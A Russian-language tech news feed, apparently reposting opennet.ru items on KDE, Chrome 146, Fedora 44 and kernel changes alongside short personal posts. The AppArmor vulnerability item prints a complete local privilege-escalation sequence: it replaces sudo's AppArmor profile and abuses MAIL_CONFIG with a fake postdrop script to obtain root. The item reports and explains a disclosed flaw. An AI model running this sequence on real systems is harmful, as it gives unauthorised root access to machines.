• Возможность привязки к приложениям отдельных профилей с настройками;
• Реализация 22 действий, связанных с навигацией, работе в браузере, редактированием и управлением воспроизведением мультимедиа;
• Настройка DPI и скорости перемещения указателя;
• Опции для инвертирования направления вертикальной и горизонтальной прокрутки;
• Автоматическое обновление соединения после временного отключения мыши.
• Поддержка сворачивания в системный лоток.
• Хранение настроек в читаемом файле в формате JSON.
• Графический интерфейс на базе Qt Quick с поддержкой тёмной темы оформдения и интерактивными диаграммами.

В KDE реализованы KIO S3, установка звуковых тем из файлов и режим ввода спецсимволов

• Добавлен режим ввода с клавиатуры диакритических знаков и спецсимволов, отсутствующих на физической клавиатуре. При удержании нажатия клавиши, связанной со спецсимволом, теперь показывается всплывающая подсказка, позволяющая во время ввода быстро выбрать нужный спецсимвол. Выбор осуществляется клавишами управления курсором, нажатием упомянутых в подсказке цифр или кликом мыши. Режим реализован в модуле plasma-keyboard и требует включения виртуальной клавиатуры (System Settings > Keyboard > Virtual Keyboard).
  
  
• Предоставлена возможность установки собственных звуковых тем из загруженных архивов, без необходимости их предварительной ручной распаковки в каталог .../share/sounds.
• Подготовлен обработчик KIO S3, позволяющий напрямую из Dolphin и приложений KDE работать с файлами, хранимыми в S3-совместимых облачных хранилищах, таких как Amazon S3, Cloudflare R2, DigitalOcean Spaces и MinIO.
• В виджетах для управления буфером обмена и сетевым подключением реализовна унифицированная кнопка возврата на прошлую страницу (на вложенных страницах теперь не показываются две кнопки "Назад").
  
  
• В KRunner по умолчанию включён плагин вывода информации о глобальных комбинациях клавиш.
• В виджете с реализацией глобального меню обеспечен показ меню для активного окна, даже если это окно размещено на другом экране. Для возвращения старого поведения, при котором меню пропадает после перемещения окна на другой экран, в настройки добавлена специальная опция.
• При мозаичной компоновке двух смежных окон они теперь равномерно центрируются во всём доступном экранном пространстве с учётом панелей (раньше ближайшее к панели окно сжималось больше, чем другое окно).
• В изолированных приложениях повышена надёжность инициирования записи скринкастов и запросов к удалённым рабочим столам.
• Налажено задействование 3D-ускорения в конфигурациях с несколькими GPU, один из которых не поддерживает OpenGL.
• Решены проблемы работы с буфером обмена в некоторых приложениях на базе фреймворка wxWidgets, таких как KiCad и Audacity. Исправление включено в состав находящейся в разработке ветки wxWidgets 3.3.3.
• В утилиту kscreen-doctor добавлена поддержка изменения свойства экранов "AutoRotatePolicy", определения активного экрана и одновременного включения/выключения поддержки HDR и расширенного диапазона цветов (Wide Gamut).
• Опубликован выпуск Marknote 1.5, приложения для создания и управления коллекцией текстовых заметок, сохраняемых в формате Markdown. В новой версии помимо ранее доступного WYSIWYG-режима визуального редактирования текста, добавлен режим для работы с исходной разметкой Markdown. Также добавлена поддержка вставки ссылок между заметками, реализован полнотекстовый поиск и предложен плагин для интеграции с KRunner.
  
  Источник: https://www.opennet.ru/opennews/art.shtml?num=64986

А между прочим сейчас в кинотеатрах показывают великий фильм «Прикосновение».

#кино

Выпуск Chrome 146. Анонсированы официальные Linux-сборки Chrome для ARM64

Отдельно компания Google анонсировала публикацию официальных сборок Chrome для Linux-систем на базе архитектуры ARM64. Linux-сборки для ARM64 начнут формироваться во втором квартале 2026 года и будут доступны в пакетах deb и rpm. Ранее официальные сборки Chrome для Linux публиковались только для архитектуры x86_64, а для архитектуры ARM64 были доступны только сторонние сборки Chromium, предлагаемые дистрибутивами. Официальная версия Chrome отличается поддержкой подключения к учётной записи в Google, интеграцией сервисов Google, синхронизацией данных между устройствами, упрощённой установкой дополнений из каталога Chrome Web Store и возможностью включения расширенного режима защиты.

Основные изменения в Chrome 146:

• Для части пользователей включён механизм выборочного ограничения полномочий (Selective permission intervention), который блокирует доступ связанных с показом рекламы JavaScript-скриптов к возможностям, влияющим на конфиденциальность, таким как доступ к информации о местоположении, микрофону, буферу обмена, Bluetooth, USB, последовательному порту и захвату экрана. Идея в том, что если пользователь предоставил странице доступ к подобным возможностям, то эти разрешения не будут применяться для размещённых на этой странице сторонних скриптов, загружаемых с других сайтов (обособленно через тег iframe или напрямую через тег script).
• Изменена структура настроек, связанных с обеспечением безопасности. Для упрощения пользователю предоставлена возможность выбора между стандартным и усиленным уровнем защиты, что позволяет получить желаемый уровень безопасности без необходимости разбираться в деталях и расширенных опциях. При выборе усиленного режима дополнительно выполняется проверка URL и содержимого на серверах Google, выводятся предупреждения для незащищённых соединений и замедляется работа нетипичных для пользователя сайтов для блокирования атак. При желании пользователь может вернуться к старой схеме раздельного конфигурирования каждой настройки. Для управления включением нового оформления настроек безопасности предложен параметр "chrome://flags/#bundled-security-settings".
• Продолжено развитие AI-режима, позволяющего взаимодействовать с AI-агентом из адресной строки или со страницы, показываемой при открытии новой вкладки. AI-режим даёт возможность задавать сложные вопросы на естественном языке и получать ответы на основе агрегирования информации из наиболее релевантных страниц на заданную тему. При необходимости пользователь может уточнять информацию наводящими вопросами. Режим также позволяет задавать вопросы о содержимом страницы прямо из адресной строки. В Chrome 146 реализована возможность использования файлов из хранилища Google Drive в качестве контекста для AI-агента.
• В режиме автоматического заполнения полей предоставлена возможность использования дополнительных типов данных, которые ранее были доступны только при включении режима расширенного автозаполнения (Enhanced autofill).
• Началось постепенное включение у пользователей защиты от обращения к локальной системе при взаимодействии с публичными сайтами. Обращения с сайтов к IP-адресам локальной сети (интранет или внутренние адреса) или loopback-интерфейсу (127.0.0.0/8) потребует подтверждения операции у пользователя. Под действия защиты попадают попытки загрузки ресурсов, запросы fetch() и iframe-вставки. Защита пока не применяется для соединений через WebSockets, WebTransport и WebRTC, но будет добавлена для них в следующем выпуске.

  Обращение к внутренним ресурсам используются злоумышленниками для косвенной идентификации и осуществления CSRF-атак на маршрутизаторы, точки доступа, принтеры, корпоративные web-интерфейсы и другие устройства и сервисы, принимающие запросы только из локальной сети. Для управления попаданием подсетей в категорию внутренних или публичных предложена настройка LocalNetworkAccessIpAddressSpaceOverrides, а для автоматического разрешения доступа для дочерних iframe на основании полномочий родительского iframe-а добавлена настройка LocalNetworkAccessPermissionsPolicyDefaultEnabled.

• Добавлены CSS-свойства "animation-trigger" и "trigger-scope" для управления анимацией на основе позиции прокрутки страницы. Например, можно запускать, останавливать или перезапускать анимацию при достижении определённой позиции прокрутки, обходясь только декларативным CSS без использования кода на JavaScript.
• Реализована поддержка реестра пользовательских элементов для разделения области видимости пользовательских HTML-элементов, что может потребоваться при использовании на одной странице нескольких разных пользовательских HTML-элементов, имеющих одно и то же имя. В случае использования на странице нескольких библиотек, определяющих элемент с одинаковым именем, при помощи JavaScript-объекта CustomElementRegistry элементы каждой библиотеки можно закрепить за определёнными частями иерархии DOM. Например, если две библиотеки определяют разные элементы с одинаковым именем ‹my-button›, то в одной части страницы можно использовать элемент ‹my-button› из первой библиотеки, а на другой - из второй.
• Добавлен API Sanitizer, который может быть полезен для чистки поступающих извне данных и вырезания из них HTML-тегов, которые могут использоваться для совершения XSS-атак. API предоставляет методы для манипуляции HTML и вырезания из содержимого HTML-элементов, влияющих на отображение и исполнение. Для безопасной вставки HTML-содержимого предложен метод element.setHTML(), похожий на element.innerHTML, но защищающий от межсайтового скриптинга (XSS). Для безопасного разбора HTML реализован метод document.parseHTML().

     const unsanitizedString = "abc ‹script›alert(1)‹" + "/script› def";
  
     const sanitizer1 = new Sanitizer({
       elements: ["div", "p", "button", "script"],
     });
     const target = document.getElementById("target");
     target.setHTML(unsanitizedString, { sanitizer: sanitizer1 });
  

• В элементе "meta" реализован параметр с именем "text-scale" (например, ‹meta name="text-scale" content="scale"›), включающий автоматическое масштабирование размера шрифта на странице в соответствии с настройками браузера и операционной системы, если на странице используются относительные единицы измерения (rem и em).
• В API WebGPU добавлен опциональный режим совместимости, предоставляющий подмножество функций, способных работать на системах с устаревшими графическими API, такими как OpenGL и Direct3D11.
• В JavaScript добавлена возможность объединять несколько итераторов в один с помощью метода Iterator.concat().
• В режиме "Origin trials" реализован API WebNN, позволяющий использовать предоставляемые операционной системой сервисы для машинного обучения и связанные с этим аппаратные возможности.
• В режиме "Origin trials" реализован API CPU Performance для получения информации об уровне производительности и характеристиках процессора (число ядер, тип, архитектура, модель, частота и т.п.).
• В режиме "Origin trials" добавлен атрибут "focusgroup", позволяющий вместо табуляции использовать клавиши управления курсором для перемещения между кнопками или другими элементами, связанными с переключением фокуса.
• Внесены улучшения в инструменты для web-разработчиков. В web-консоли обеспечено сохранение результатов редактирования команд при навигации по истории операций. В панели Elements реализовано отображение CSS-стилей, добавленных программно к Shadow DOM, через отдельный узел "#adopted-style-sheets" в дереве DOM, по аналогии с просмотром и редактированием стилей, определённых через тег ‹style›.

Кроме нововведений и исправления ошибок в новой версии устранено 29 уязвимостей. Многие из уязвимостей выявлены в результате автоматизированного тестирования инструментами AddressSanitizer, MemorySanitizer, Control Flow Integrity, LibFuzzer и AFL. Одной из проблем (переполнение буфера в WebML) присвоен критический уровень опасности, подразумевающий, что уязвимость позволяет обойти все уровни защиты браузера и выполнить код в системе за пределами sandbox-окружения. В рамках программы по выплате денежного вознаграждения за обнаружение уязвимостей для текущего релиза компания Google учредила 29 премий и выплатила 211 тысяч долларов США, что стало рекордом по размеру выплат в рамках одного релиза (две премии $43000, по одной премии в $36000, $33000, $11000 и $7000, по две премии в $10000 и $3000, по 4 премии в $2000 и $1000). Размер 12 вознаграждений пока не определён.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64979

Экзотика или...? Об OpenBSD с Вячеславом Воронцовым

(#openbsd)

Вышла-таки первая книжка от нашей команды. Не исключено, что в некоторых странах можно угодить в каталажку даже за чтение этого маллеуса малефикарума!

(#чтопочитать, #books)

Вышла-таки первая книжка от нашей команды. Не исключено, что в некоторых странах можно угодить в каталажку даже за чтение этого маллеуса малефикарума!

(#чтопочитать, #books)

В соседний двор пришла весна.

Уязвимости в AppArmor, позволяющие получить root-доступ в системе

Проблемы присутствуют в LSM-модуле AppArmor начиная с ядра Linux 4.11, выпущенного в 2017 году, и проявляются в дистрибутивах, использующих AppArmor, таких как Ubuntu, Debian, openSUSE и SUSE (начиная с openSUSE/SUSE 16 по умолчанию задействован SELinux, но AppArmor оставлен в качестве опции). Патчи с устранением уязвимостей переданы разработчикам ядра и в ближайшие дни будут предложены пользователям в составе обновлений 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 и 5.10.253. Исправление также включено в сегодняшние обновления пакетов с ядром для Ubuntu. Попутно в Ubuntu выпущены обновления пакетов sudo, sudo-ldap и util-linux (в состав входит утилита su), в которых устранены недоработки, позволявшие эксплуатировать уязвимость в AppArmor. В Debian обновление в процессе подготовки.

Проблемы вызваны выявлением в AppArmor фундаментальной уязвимости класса "обманутый посредник" ("confused-deputy"), позволяющей непривилегированным пользователям загружать, заменять и удалять произвольные профили AppArmor. Данная уязвимость напрямую может использоваться для отключения защиты программ и сервисов от локальных и удалённых атак (через запись псевдофайлов /sys/kernel/security/apparmor/.load, .replace и .remove, например, для снятия ограничений в cupsd и rsyslogd), вызова отказа в обслуживании (через применение запрещающих профилей) и обхода ограничений пространств имён (через загрузку нового AppArmor-профиля "userns" для /usr/bin/time, позволяющего создавать неограниченные user namespace).

Возможность замены профилей AppArmor также позволяет добиться получения root-привилегий через привязку к привилегированным утилитам, таким как su и sudo, новых профилей, блокирующих доступ к некоторым системным вызовам. В частности, права root можно получить блокировав операцию setuid (CAP_SETUID) для утилиты sudo в сочетании с манипуляцией переменной окружения MAIL_CONFIG для смены каталога с настройками для почтового сервера Postfix.

Суть метода в том, что при возникновении проблем утилита sudo отправляет администратору письмо, запуская /usr/sbin/sendmail. Блокировав сброс привилегий можно добиться запуска данного процесса с правами root, а выставив перед запуском sudo переменную окружения MAIL_CONFIG можно передать утилите sendmail другие настройки, в том числе указать свой обработчик postdrop, запускаемый при отправке почты.

   $ mkdir /tmp/postfix

   $ cat › /tmp/postfix/main.cf ‹‹ "EOF"
   command_directory = /tmp/postfix
   EOF

   $ cat › /tmp/postfix/postdrop ‹‹ "EOF"
   #!/bin/sh
   /usr/bin/id ›› /tmp/postfix/pwned
   EOF

   $ chmod -R 0755 /tmp/postfix

   $ apparmor_parser -K -o sudo.pf ‹‹ "EOF"
   /usr/bin/sudo {
     allow file,
     allow signal,
     allow network,
     allow capability,
     deny capability setuid,
   }
   EOF

  $ su -P -c 'stty raw && cat sudo.pf' "$USER" › /sys/kernel/security/apparmor/.replace
   Password: 

  $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever

   sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted
   sudo: unable to open /etc/sudoers: Operation not permitted
   sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted
   sudo: error initializing audit plugin sudoers_audit

   $ cat /tmp/postfix/pwned
   uid=0(root) gid=1001(jane) groups=1001(jane),100(users)

В качестве других способов повышения привилегий упоминаются уязвимости в коде AppArmor, работающем на уровне ядра Linux. Показано как получить права root при помощи уязвимостей, вызванных двойным выполнение функции free() и обращением к уже освобождённой области памяти (use‑after‑free) в коде загрузки и замены профилей AppArmor. Например, AppArmor сохраняет профиль в структуре aa_loaddata, память для которой выделяется в slab-кэше kmalloc-192, при этом не исключено обращение к памяти, которую занимала структура, после её освобождения из-за состояния гонки. Данную проблему можно использовать для получения контроля над освобожденной памятью и перераспределения освобождённой страницы памяти для маппинга содержимого файла /etc/passwd и перезаписи строки с паролем root.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64984

Уязвимость в GSSAPI-патче к OpenSSH, удалённо эксплуатируемая на стадии до аутентификации

Примечательно, что в своё время разработчики OpenSSH отказались принимать в основной состав изменение для поддержки GSSAPI из-за сомнений в его безопасности. При этом многие дистрибутивы Linux включили данный патч в свои пакеты c OpenSSH. В обиходе встречается несколько версий GSSAPI-патча, но в большинстве из них имеется приводящая к уязвимости ошибка. Исправление пока доступно только в форме патча, изменения в котором сводятся к замене вызова функции sshpkt_disconnect() на ssh_packet_disconnect() в файле kexgsss.c.

В настоящее время наличие уязвимости подтверждено в Debian и Ubuntu. В остальных дистрибутивах применение проблемного патча и его подверженность уязвимости уточняется (SUSE/openSUSE, RHEL, Gentoo, Arch, Fedora). Уязвимость проявляется только при включении в настройках опции "GSSAPIKeyExchange yes". На возможность эксплуатации также влияют опции компилятора с которыми в дистрибутивах собран пакет.

Причиной возникновение уязвимости является ошибка в функции sshpkt_disconnect(), из-за которой процесс не завершался после поступления disconnect-сообщения, что позволяло атакующему на стадии согласования ключей отправить не предусмотренный логикой работы сервера тип GSSAPI-сообщения. После поступления внепланового GSSAPI-сообщения, сервер помещает его в очередь и не прерывает выполнение программы, но при этом не инициализирует переменные, определяющие параметры соединения. В дальнейшем в цикле обработки событий выполняется код, который читает неинициализированную структуру recv_tok из стека (читаются данные, оставшиеся в стеке от прошлого вызова функции), отправляет её привилегированному процессу через IPC и затем передаёт в функцию gss_release_buffer(), которая может вызвать функцию free() и освободить память для некорректного указателя, ссылающегося на случайную область памяти.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64983

ifixit

That’s why Lenovo’s newest ThinkPads are such a big deal: the new T14 Gen 7 and T16 Gen 5 score an eye-popping 10 out of 10 on our repairability scale.

Все парадные оклеили объявлениями с курокодами, пишут, что создали уважаемым жителям чат в МАХ, и туда надо вступить, "чтобы не потеряться"..

Уязвимость в GSSAPI-патче к OpenSSH, удалённо эксплуатируемая на стадии до аутентификации

Примечательно, что в своё время разработчики OpenSSH отказались принимать в основной состав изменение для поддержки GSSAPI из-за сомнений в его безопасности. При этом многие дистрибутивы Linux включили данный патч в свои пакеты c OpenSSH. В обиходе встречается несколько версий GSSAPI-патча, но в большинстве из них имеется приводящая к уязвимости ошибка. Исправление пока доступно только в форме патча, изменения в котором сводятся к замене вызова функции sshpkt_disconnect() на ssh_packet_disconnect() в файле kexgsss.c.

В настоящее время наличие уязвимости подтверждено в Debian и Ubuntu. В остальных дистрибутивах применение проблемного патча и его подверженность уязвимости уточняется (SUSE/openSUSE, RHEL, Gentoo, Arch, Fedora). Уязвимость проявляется только при включении в настройках опции "GSSAPIKeyExchange yes". На возможность эксплуатации также влияют опции компилятора с которыми в дистрибутивах собран пакет.

Причиной возникновение уязвимости является ошибка в функции sshpkt_disconnect(), из-за которой процесс не завершался после поступления disconnect-сообщения, что позволяло атакующему на стадии согласования ключей отправить не предусмотренный логикой работы сервера тип GSSAPI-сообщения. После поступления внепланового GSSAPI-сообщения, сервер помещает его в очередь и не прерывает выполнение программы, но при этом не инициализирует переменные, определяющие параметры соединения. В дальнейшем в цикле обработки событий выполняется код, который читает неинициализированную структуру recv_tok из стека (читаются данные, оставшиеся в стеке от прошлого вызова функции), отправляет её привилегированному процессу через IPC и затем передаёт в функцию gss_release_buffer(), которая может вызвать функцию free() и освободить память для некорректного указателя, ссылающегося на случайную область памяти.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64983

Предложение по переводу системных логов lastlog, btmp, utmp и wtmp на использование SQLite

В настоящее время для хранения данных о сеансах и попытках аутентификации в Linux используются следующие бинарные файлы, имеющие фиксированную структуру:

• /var/log/lastlog - время последнего входа (структура "struct lastlog" с полем "ll_time" 32-разрядного типа time_t);
• /var/log/btmp - неудачные попытки входа;
• /var/run/utmp - текущие сеансы;
• /var/log/wtmp - история входов и выходов.

Формат данных файлов был разработан несколько десятилетий назад и имеет ряд фундаментальных ограничений:

• Поле "tv_sec" в структуре "utmpx" и поле "ll_time" в "lastlog" имеют тип "int32_t", значение счётчиков времени на основе которого переполнится 19 января 2038 года. Из-за требований ABI‑совместимости даже на 64-разрядных системах эти поля остаются 32-разрядными, поэтому проблема затронет все установки Linux.
• Фиксированный размер записей не позволяет добавлять новые поля (например, идентификатор контейнера, имя сервиса, IP-адрес) без полной замены формата и перекомпиляции всех утилит.
• Утилиты last, lastb, who и lastlog вынуждены линейно перебирать содержимое файлов. При большом размере журналов без использования индексов, позволяющих эффективно фильтровать записи, нагрузка на систему ввода/вывода и задержки при выполнении запросов становятся неприемлемыми.
• Запись в бинарный файл не является атомарной операцией. При сбое запись может быть частично повреждена.
• Для исключения конфликтов при одновременной записи в журтал несколькими процессами (например, sshd и login) используются flock-блокировки, которые не гарантируют атомарность и могут приводить к взаимным блокировкам.

Автор RFC предлагает полностью отказаться от бинарных форматов в пользу специализированных разделяемых библиотек, использующих SQLite. Для каждого типа журналов создаётся отдельная библиотека с единообразным C-интерфейсом: liblastlog2, libbtmp2, libutmp2 и libwtmp2. Все библиотеки работают с БД, схема которых включает 64-разрядные временные метки (тип INTEGER) и индексы по пользователю и времени. Имеется возможность добавления новых полей без нарушения совместимости (через ALTER TABLE).

Среди доводов в пользу использования SQLite упоминается использование 64-разрядного типа INTEGER для хранения эпохального времени, задействование индексов для снижения ввода/вывода за счёт выборочного обращения к записями вместо полного сканирования, возможность добавления новых полей без изменения существующих записей, поддержка ACID-транзакций, режим WAL (Write-Ahead Logging) для конкурентного доступа без блокировок, проверенная надёжность работы SQLite.

Для обеспечения плавного перехода предлагается стратегия "двойной записи" (dual-write):

• Программы, которые пишут в бинарные файлы (login, sshd, sudo, cron и др.), модифицируются так, чтобы одновременно выполнять запись и в старый бинарный файл, и в новую SQLite-базу через соответствующую библиотеку.
• Разрабатываются новые версии утилит (last2, lastb2, who2, lastlog2), которые читают данные из SQLite-баз, используя индексы для быстрой работы. Старые утилиты продолжают работать с прежними файлами.
• Через несколько лет, когда подавляющее большинство систем обновятся, поддержка записи в старые форматы может быть отключена, а старые утилиты - объявлены устаревшими.

Вопросы, выставленные для дополнительного обсуждения:

• Целесообразность разделения на отдельные библиотеки или объединения в одну (например, libsession2).
• Выбор имён для библиотек и утилит (сохранить исторические названия или перейти к более общим).
• Расположение файлов баз данных (/var/lib/ как для состояния приложений или /var/log/ как для логов).
• Механизм версионирования схемы и миграции.
• Параметры производительности SQLite для различных сценариев (серверы, встраиваемые системы).
• Предоставление fallback-бэкенда, хранящего журналы в упрощённом бинарном формате, для систем, на которых SQLite может оказаться избыточным (например, встраиваемые устройства с жёсткими ограничениями по памяти).

В 2024 году Google выплатил 17.1 млн долларов вознаграждений за выявление уязвимостей

Из потраченной в 2025 году суммы $2.9 млн (в 2024 году $3.3 млн, в 2023 - $3.4 млн) выплачено за уязвимости в Android. За информацию об уязвимостях в браузере Chrome выплачено 100 премий на общую сумму $3.7 млн (в 2024 году $2.1 млн, в 2023 - $3.5 млн). За уязвимости в открытых проектах выплачены 62 премии на сумму 327 тысяч долларов. За уязвимости в облачных продуктах Google выплачено 143 премии на сумму $3.5 млн. За уязвимости в AI-продуктах выплачено 890 тысяч долларов.

Размер самой большой единичной выплаты составил 250 тысяч долларов за обнаружение логической ошибки в IPC-механизме Chrome, позволившей создать эксплоит для выполнения кода в обход применяемой в браузере sandbox-изоляции.

Delayed hibernation comes to OpenBSD/amd64 laptops

The commit message reads,

List:       openbsd-cvs
Subject:    CVS: cvs.openbsd.org: src
From:       Mark Kettenis <<ettenis () cvs ! openbsd ! org>
Date:       2026-03-11 16:18:42

CVSROOT:	/cvs
Module name:	src
Changes by:	kettenis@cvs.openbsd.org	2026/03/11 10:18:42

Read more…

"Говорят, если москвичу отрубить интернет он ещё два часа будет бегать и рассказывать про самые удобные сервисы"

Главный разработчик Lutris прокомментировал появление в проекте кода, созданного через AI

По словам создателя Lutris, несколько месяцев назад AI-инструментарий Claude стал генерировать вполне достойный код и благодаря AI удалось сделать всё, что было упущено в прошлом году из-за проблем со здоровьем и депрессии. Он также заявил, что предполагал возможный негатив в отношении появления изменений, подготовленных с использованием AI, и поэтому несколько дней назад удалил упоминание о соавторстве Claude из коммитов и пожелал удачи в попытках определить, что было сгенерировано AI, а что - нет.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64977

Four years of Russian internet censorship
turned into sound – project by Denis Yagodine

Eight of Russia's largest ISPs play simultaneously - each one a voice, each day a tenth of a second. Pitch follows the level of DPI filtering: the more traffic an ISP blocks, the higher it sounds. Notes are quantized to A minor pentatonic. The timbre shifts too - clean tones at law enforcement, harsh overtones at high. Sub-bass hits mark key dates: the
invasion, Instagram ban, mobilization, VPN crackdowns, YouTube throttling, mass mobile

Built from 1,493 days of per-ASN Cloudflare Radar TCP reset data (Feb 2022 - Mar 2026). Stereo, additive synthesis, 44.1 kHz. No samples, no loops - pure data.

https://soundcloud.com/denis-33470178/enforcement-8-isps-2022-2026

"Our proprietary AI robots independently recreate any open source project from scratch"

https://malus.sh/

Энтузиасты создали do-нотацию для C++

   // Без DSL:
   auto result = bind(mx, [&](auto x) {
     return bind(my, [&](auto y) {
       return make_value(x, y);
     });
   });
   
   // С DSL:
   auto result = DO(
     LET x IS(mx);
     LET y IS(my);
     return make_value(x, y);
   );

Компания Igalia представила Moonforge, дистрибутив для встраиваемых систем

Moonforge предоставляет разработчикам и системным интеграторам каркас, набор файлов конфигурации и коллекцию компонентов для формирования атомарно обновляемых системных образов, основанных на применении уже проверенных и распространённых в индустрии технологий, таких как yocto, bitbake и kas. Для сформированных образов поддерживается упрощённый процесс установки обновлений и обеспечивается длительный цикл сопровождения. Основная цель проекта - предоставить разработчика встраиваемых систем удобный инструментарий, дающих возможность сосредоточиться на развитии специфичной для их продукта функциональности и не тратить время на задачи, связанные с формированием и поддержанием дистрибутива.

Системный образ компонуется из набора готовых модулей Yocto. Каждый модуль отвечает за определённую возможность или поддержку конкретной целевой аппаратной платформы. Например, предлагаются модули для поддержки Docker, QEMU или Podman, управления обновлениями через RAUC, формирования графического интерфейса на базе композитного сервера Weston, запуска браузерного интерфейса на базе Webkit для интернет-киосков и сборки для плат Raspberri Pi 4 и 5.

Поддерживается три канала распространения релизов: stable (стабильная LTS-ветка), next (ветка, в которой развивается следующий LTS-релиз) и main (экспериментальная ветка, в которой ведётся разработка). Каждая ветка привязана к своей версии набора компонентов Yocto. Стабильная ветка обновляется раз в месяц и соответствует LTS-релизам Yocto.

Обновления доставляются в режиме OTA (Over-The-Air) с использованием инструментария Mender и устанавливаются атомарно через замену целиком всей системы. На накопителе создаётся два идентичных корневых раздела - активный и пассивный. Новое обновление устанавливается в пассивный раздел, никак не влияя на работу активного. После перезагрузки разделы меняются местами - раздел с новым обновлением становится активным, а прошлый активный раздел переводится в пассивный режим и ожидает установки следующего обновления. Если после обновления что-то пошло не так, осуществляется откат на прошлый вариант системы.

Для создания системных образов используется инструментарий BitBake, а для формирования конфигурации и обеспечения воспроизводимых сборок - kas. Сборки, обновления, отчёты об уязвимостях и метаданные SBOM (Software Bill of Materials) автоматически собираются и публикуются с использованием систем непрерывной интеграции и непрерывного развёртывания (CI/CD). Сборочная инфраструктура на базе Moonforge может быть развёрнута как на локальных серверах, так и в публичных или приватных облачных окружениях.

Для прозрачности и предсказуемости процессов создания производных продуктов в дистрибутиве применяется жёсткое разделение между upstream- и downstream-компонентами, позволяющее разработчикам при необходимости добавлять дополнительную функциональность поверх базовой начинки. Конфигурация определяется в декларативном представлении, используя формат YAML, и охватывает такие области как подключение внешних репозиториев, активация модулей Yocto, управление зависимостями между компонентами дистрибутива, применение дополнительных патчей и изменение применяемых по умолчанию системных настроек.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64974

Мой признак весны этого года: уже который день наблюдаю в вагонах метро девушек, наносящих макияж.

(#сегодня)

Провалилось солнце в яму...
#photography #WTphoto #landscape #sunset #пейзаж #закат

В ядрах для платформы Android включена оптимизация AutoFDO

Ранее оптимизация AutoFDO уже применялась в Android при сборке системных библиотек и исполняемых файлов в пользовательском пространстве, и в среднем позволила ускорить запуск программ на 4% и сократить время загрузки на 1%. При этом оптимизация AutoFDO до недавних пор не применялась для ядра Linux, на выполнение компонентов которого по статистике Google в Android тратится 40% процессорного времени.

В проведённых тестах включение AutoFDO для ядра привело к сокращению времени загрузки на 2.1%, ускорению первого запуска программ на 4.3%, повышению эффективности системных вызовов на 9.3%, сокращению времени выполнения mmap-транзакций Binder на 12.3%, HwBinder на 20% и Binder RPC на 21.7%.

Выпуск D7VK 1.5 с добавлением поддержки Direct3D 3

В новом выпуске обеспечена экспериментальная поддержка графического API Direct3D 3 в дополнение к ранее доступной поддержке Direct3D 5, 6 и 7. Что касается, других версий Direct3D, то версия DirectX 1 не включала 3D-компоненты. API Direct3D появился в версии DirectX 2, которая по большому счёту аналогична DirectX 3. Версия DirectX 4 не была выпущена Microsoft и осталась в состоянии прототипа (следом за DirectX 3 сразу вышел DirectX 4). Поддержка Direct3D 8, 9, 10 и 11 предоставляется отдельным проектом DXVK.

В D7VK 1.5 также проведена работа по устранению ошибок и улучшению совместимости с играми кода для поддержки Direct3D 5, 6 и Direct3D 7. Реализована поддержка буферов исполнения (Execute buffers) для передачи команд GPU, возможность записи в кадровый буфер (Back buffer) и буфер глубины (Depth buffer), а также поддержка старого метода потоковой передачи вершинных буферов с обрамлением командами Begin и End.

Добавлена поддержка игр:

• Delta Force 2
• Empire of the Ants (2000)
• Frogger (1997)
• Gorky 17
• Ground Control
• Incoming
• Knight Rider
• MotoRacer2
• Need For Speed 3/4
• Nocturne
• O.D.T.: Escape... Or Die Trying
• Outlaws
• Radeon's Ark
• Rage Dawning
• SimCity 4
• Star Wars: Jedi Knight: Dark Forces II
• Star Wars: Shadows of the Empire
• Summoner
• Take No Prisoners
• The Mystery of the Druids
• Total Club Manager 2003
• Urban Chaos
• Venom. Codename: Outbreak
• Wing Commander: Prophecy

Предложены патчи, убирающие возможность сборки IPv6 в форме модуля ядра

Суть проблемы в том, что когда ядро поддерживает сборку IPv6 модулем ядра (CONFIG_IPV6=m), множество подсистем вынуждены добавлять бесполезные обработчики на случай выгрузки модуля IPv6. Поэтому предлагается ограничить выбор опциями для встраивания IPv6 в ядро (CONFIG_IPV6=y) и полного отключения IPv6 (CONFIG_IPV6=n), что избавит сетевую подсистему, BPF, Netfilter и некоторые драйверы от необходимости обработки выгрузки модуля.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64968

Бета-тестирование Fedora Linux 44. Инициатива по продвижению инноваций в Fedora

Наиболее значимые изменения в Fedora Linux 44:

• Проведена работа по доведению инфраструктуры для воспроизводимых сборок до охвата не менее чем 99% пакетов в репозитории Fedora. В прошлых выпусках охват воспроизводимыми сборками оценивался в 90%, благодаря внесения в сборочную систему изменений, синхронизирующих метаданные о времени модификации файлов с эталонным исходным кодом, а также обеспечивающих постоянный порядок перечисления метаданных и структур в бинарных файлах. Для обеспечения воспроизводимых сборок в оставшихся 10% к участию были привлечены мэнтйнеры проблемных пакетов. Воспроизводимые сборки дают пользователю возможность лично убедиться, что распространяемые в пакетах бинарные файлы собраны из предоставляемого исходного кода и не содержат скрытых изменений, осуществлённых в результате компрометации компилятора или сборочного инструментария.
• Во всех вариантах дистрибутива со средой рабочего стола KDE (Fedora KDE Plasma Desktop Edition, Fedora KDE Plasma Mobile Spin и Fedora Kinoite) для настройки системы после установки задействован развиваемый проектом KDE мастер начальной настройки Plasma Setup, а в инсталляторе Anaconda отключены пересекающиеся с данным приложением стадии конфигурирования системы.
• Во всех редакциях с KDE менеджер входа SDDM заменён на Plasma Login Manager, развиваемый проектом KDE.
• Переработана редакция Fedora Games Lab, предлагающая подборку пакетов и настроек для любителей компьютерных игр. В новом варианте обновлён программный стек для запуска игр и задействованы актуальные технологии, такие как Wayland и PipeWire.
• Среда рабочего стола GNOME обновлена до ветки 50, в которой прекращена поддержка X11 и реализована новая система сохранения сеансов.
• Пользовательское окружение Budgie обновлено до ветки 10.10, переведённой на Walyand.
• В инсталляторе Anaconda изменена логика создания в установленной системе сетевых профилей (файлов с настройками для NetworkManager). Подобные профили теперь создаются не для всех имеющихся проводных сетевых устройств, а только для устройств, настроенных в процессе установки через GUI, загрузочные опции или kickstart-файл. Создание профилей для всех доступных устройств, а не только выбранных пользователем, требовало удаления лишних профилей после установки и вызывало трудности при последующей необходимости изменения настроек.
